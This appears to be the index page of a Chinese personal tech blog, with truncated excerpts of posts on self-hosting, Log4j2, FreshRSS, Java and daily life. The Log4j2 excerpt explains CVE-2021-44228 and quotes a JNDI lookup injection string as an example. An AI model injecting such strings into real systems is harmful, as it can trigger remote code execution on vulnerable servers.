前几天新的域名备案成功了。停运了一个多月的地铁站终于在前几天开放了，然而只是站内施工基本结束，站外仍是一片狼藉。 因为地铁站施工，最近几个周末都吵得不行，从早到晚都是当当当当开凿地面的声音，穿透力极强，关了窗户带上耳机都能听到，这个没什么办法。可是昨天，我发现我家里运行的服务器突然连不上了，网站也几乎全部挂掉了，一问才知道，是施工队挖断了光缆。早上挖断的，晚上才恢复。 昨天开始陆续将一些重要站点（博客图床和主页）从家里那台 NUC 上迁移到腾讯云。200 多新购了一个 2C4G * 3 年 的轻量云服务器，配置方面对于这些网站来说绰绰有余。 今天上午和下午，光纤又分别被挖断一次，上午在睡觉，没受影响。下午再来一次，写这篇博客的时候，网络仍是中断的。我是本地改 hosts 到局域网地址在 codeserver 上写的，估计恢复还要几个小时。后面计划将 codeserver、bitwarden 也迁移上去。 经过这次断网，我放弃了将所有网站 all in one 在一台 NUC 服务器上的做法，毕竟自己维护的服务器，完全做不到 7 * 24 稳定运行，就算是在局域网环境下，也不可能完全 ...

Log4j2 重大漏洞近来日志框架 Log4j2 爆出的 “核弹级” 漏洞 CVE-2021-44228，攻击者可以通过构造特殊的输入将指令发送到服务器然后由 Log4j2 解析执行！此次漏洞的危险等级和影响范围可以说是空前的，主要是 Log4j2 在 Java 日志框架领域的应用实在是太广泛了，并且漏洞的利用门槛又是如此之低，所以一下子炸开了锅。 就连各大网站的评论区，都能看到 “黑客” 的身影 [doge]（这位当然是来搞笑的，知乎用的是 Python 吧） 言归正传。Apache 官方很快发布了漏洞的修复版本 2.15.0， 所有受影响的项目都需要发布补丁进行修复，Javaer 要加班了。 Log4j2 漏洞攻击原理Log4j2 是 Java 中的一款日志框架，拥有着不错性能。所谓日志就是程序记录运行状态和一些关键信息的，日志中的一些信息可能来源于用户输入，如用户搜索，发表评论等，由于 Log4j2 中的 Lookups 特性，输入的信息可能会被当成指令去执行，如 1${jndi:ldap://127.0.0.1:1389/a} 借助 jndi 黑客可以将 ...

接上回。昨天拿到了 900 多个个人博客的链接并进行了一番简单分析。现在有了新的需求，我想订阅这些网站，但是一个个点进去看实在太辛苦了，我想的是如果能一键全部订阅了，到时候看到不合适的再取消订阅总比一个个订阅要来的方便吧。 首先，要知道一个博客有没有可用的 RSS 订阅源，在 html 中寻找 type = application/rss+xml 的 link 标签即可，xpath 语法为 1rss = html.xpath('//link[contains(@type, "application/rss+xml")]/@href') 拿到 RSS 源的地址后，我一开始以为 FreshRSS 提供了添加新订阅的 API，然而并没有。好在 FreshRSS 是自建的服务，数据库就掌握在自己手里，不行就直接 SQL 语句插入到表里吧，看了一下 FreshRSS 的订阅表结构 关键字段为， 其余字段和其它行一样即可 字段 含义 url RSS 源地址 category 分类，参照 admin_category 表 name 站点 ...

首先是决定更换域名，由 lixinyu.info 改为 omgxy.com 。一直使用 info 这个域名，原因无非是只有这个域名备案了，可以解析到腾讯云国内服务器，速度足够快。这次一来换成了主流的 com 域名，其次缩短了两个字母，我认为这个新域名还是挺好记的。老域名绑定了大概十几个站点，好在都是通过 Nginx 反代的，经过数小时的努力，所有站点都平滑过渡到了新域名。新域名还没备案，临时找了一个还有两个月到期的香港 VPS 挂了一个 frps 做了下中转，等新域名备案了再改下解析即可。 回到正题，博客这个东西我是一直有在弄的，但是写的一共也没几篇。常常是来了兴致就捯饬捯饬，玩不一会就丢到一边，放任其荒芜。近来关注到一些的博客站点，或十年如一日，沉淀着岁月的美好；或形式别具一格，观之赏心悦目。。。感触颇深。 最近发现一个叫 “十年之约” 的项目，大概是一个博客聚合站点，抱团取暖的感觉。浏览了一下上面陈列的一些站点，也确实有一些质量比较高的，展示了从 2017 年至今每年加入的博客站点，粗略估计收录有千余个博客站点。但是浏览起来感觉有些费劲，里面也不全是精品，有些甚至都打不开了。于是有 ...

初次接触 Confluence 是因为上家公司里用的是 Confluence + Jira 的组合，但是版本较老。我在团队的空间里写的笔记不多，偶尔能看到之前同事留下的一些技术文章和片段，但更多的还是用来记录项目的需求、会议记录、开发环境和版本迭代信息等。 作为一款知识管理工具，Confluence 还算是比较出色的，而且用久了渐渐离不开了。今年早些时候 Confluence 宣布不再售卖 Datacenter 也就是独立部署的版本，将用户引向 SaaS 服务版。确实，对于大多数用户而言，使用 SaaS 服务要便捷不少，不用去花费时间去部署和维护服务器。对于软件的提供方来说，SaaS 化的服务也更方便进行推广和迭代。 我个人的情况是，如果某个软件提供了可独立部署的选项，那我肯定是偏向于独立部署的，如果开放源代码，那就更好不过。而且 SaaS 版的由于各种原因，网络加载很慢。于是，在今年的 2 月份，也就是 Confluence 停止销售独立部署 License 的前一天，我购买了 Datacenter 版的授权，使用 Docker 部署了一份 Confluence 网站，然后将笔记陆续 ...

在 M1 芯片的机器上搭建 Java 开发环境, 如果要选择 1.8 版本的 JDK, 网上推荐 zulu OpenJDK 的比较多, Oracle 官方没有提供二进制的版本。想着既然能用那就没必要自己去编译，之前试过编译 OpenJDK, 要踩的坑不少, 遂安装之。 今天在启动一个项目的时候, 提示数据库连不上, 从异常类名称初步推断是在建立 SSL 握手阶段遇到协议不匹配的问题了 123Caused by: javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate) at sun.security.ssl.HandshakeContext.<init>(HandshakeContext.java:171) at sun.security.ssl.ClientHandshakeContext.<init>(ClientHandshakeContext.java:103) 我感到十分诧 ...

在 Java 中有一个特殊的接口 Serializable，很长一段时间只知道其与类的序列化和反序列化有关，有的人习惯给实体类实现这个方法并定义一个常量 serialVersionUID 有些人在编码过程中从来不使用 Serializable. 这两种截然不同的做法，都不曾听说有哪一种会遇到什么问题，然而这本身就是一种令人困扰的话题，究竟要不要去实现 Serializable? 关于这个问题，最早是在 V 站看过一篇讨论，同意需要实现的占相对多数，也有不少人认为完全不需要去实现 Serializable. 首先，实现 Serializable 与否究竟有什么差异我认为，如果一个类不实现 Serializable 接口，直接的影响是无法使用 Java 原生的序列化方法对这个类进行序列化和反序列化。下面是将 Java 类写入到磁盘的例子 1234567SimpleUser user = new SimpleUser();user.setId(1L);user.setFullName("李新宇");FileOutputStream fo = new FileOutput ...

早上起来首先是一件不太愉快的事情，本来想申请在家办公（公司每月可申请一次 Work Home），因为最近事情比较少，项目进度也提前很多。早上醒的比较早，身心有点疲惫，就想着申请下远程中午好好休息休息。谁知道 Leader 告诉我 HR 上次说周一因为有周会不允许请远程假了，我感到很困惑，取消了请假流程。因为 HR 并没有通知过这件事情，而且每周一的周会是在线上进行的，我在家也是一样的参加。又过了一会儿，HR 才在工作群里通知了这件事情，令人费解，仿佛我成了典型一样。然而之前我都没有在周一申请过远程，甚至有时候远程都忘了用，因为远程并不会让你轻松多少。 从入职到现在，可以感觉到公司的福利在一点点变少，政策也在慢慢收紧。每月一次的远程办公曾经是我考虑入职的一个重要因素，（彼时还有几个给到更高或者同等薪资的公司的 Offer）。举例来说，我入职那会儿公司是不打卡的，大家每天照样勤勤恳恳，自觉按时上下班。并且允许你在工作群知会原因的情况下晚到一段时间。那时候我每天来的很早。最近一段时间开始使用企业微信打卡，可是不知道为什么，每天起早的积极性反而降低了。当然对于打卡的制度我是支持的，毕竟上家公 ...

最近几天没什么新闻。 天气倒是很好，工作也不算太忙。也陆陆续续发生了一些小事，睡眠质量依旧不佳。 周末在家煎牛排。不是多么喜欢牛排的口味，而是在我看来牛排即快手又饱腹。前几次做的还意外的成功 这次在放油的时候不小心多倒了点，心里想着也不碍事。我戴上手套，等油烧热后，抓起腌制好的牛排扔进锅里，瞬间迸起滚烫的油滴，油温估计有 150 度左右，溅到了我的手指、手臂、眼睛里！没错，我确信油溅进眼睛里了，随即关火冲向洗手间用温水冲洗眼睛。幸运的是，并没有造成什么大碍，甚至在用毛巾擦干后，我已然能够睁开眼睛，看清镜子中的自己，谢天谢地！灼烧感也不是很强烈，应该是眼睛表面湿润的液体缓冲了这突如其来的高温，使其温度降低到不足以对眼球组织造成损伤的程度。不得不感叹，人体的自我防御和修复能力真的太强了！至于手上的轻微烫伤，就更不值一提了，以前也遇到过，大概一个星期印记就会消失不见。 虽说如此，现在想起来还是挺后怕的，毕竟眼睛这么脆弱的部位，真的经不起任何折腾啊，匆忙下单了一个护目镜。 十一月的第一天，住处附近的地铁站因施工停运了，要到 12 月份才会再开放，应该是要和刚修的 6 号线并线。于是这整个一 ...

上次买电子产品，还是几个月之前。现在似乎对电子产品没有啥追求了，要么太贵玩不起，要么都已经有了。今年趁着双十一（现在可能还不算双十一，突然有想法，也没管那么多），入手了很久之前就想买的绘画用的数位板。 刚到手甚至有点不会用，折腾了好一会才把驱动下好 买这个板子主要原因是一次交谈中一位朋友得知我会画画，想让我帮忙改几幅卡通图片，我答应了。我拿到图片一看，是某明星的娃娃公仔图，只有一个头，身子是果的🙃 要我画一件万圣节主题的衣服，好像是要参加什么活动来的。 严格来说，我并不是特别擅长绘画，中小学的时候对这个挺感兴趣的，不过也只限于美术课上随便画画，大学参加的宣传部，画过一两次，不能称得上好。这也算是一次契机，技多不压身，快节奏的生活中，偶尔静下心来，写写画画也是不错的。 绘画软件我之前只听说过 SAI，奈何它没有 MacOS 版本，作罢，还是 photoshop 用得最多，就用它来画吧，没有那么多画笔，就先用基础的笔刷画。在 pixiv 找了一张万圣节漫画人物的图片 照着画件衣服，历经两个晚上。。。上成果图 画得还挺粗糙的，感觉那些原画师和漫画家都太厉害了，创作绝非易事啊。不知 ...